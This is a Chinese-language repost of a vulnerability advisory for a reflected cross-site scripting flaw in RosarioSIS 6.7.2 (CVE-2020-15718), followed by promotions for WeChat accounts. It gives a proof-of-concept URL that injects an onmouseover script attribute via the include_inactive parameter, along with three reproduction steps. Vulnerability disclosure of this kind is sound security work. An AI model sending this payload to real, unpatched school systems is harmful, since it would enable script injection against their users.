首页/资讯中心/详情

RosarioSIS 6.7.2 跨站脚本(XSS)漏洞利用详情

RosarioSIS 6.7.2 跨站脚本(XSS)漏洞利用详情
📅 发布时间:2026/6/26 18:57:01

漏洞标题:RosarioSIS 6.7.2 - 跨站脚本(XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://gitlab.com/francoisjacquet/rosariosis

软件链接:https://gitlab.com/francoisjacquet/rosariosis

版本:6.7.2

测试环境:Windows

CVE:CVE-2020-15718

概念验证(PoC)

http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
    vFeWrvjTa1MAJGiVvh58g34NURJ0b57eIr+/Db+QwMo=

更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码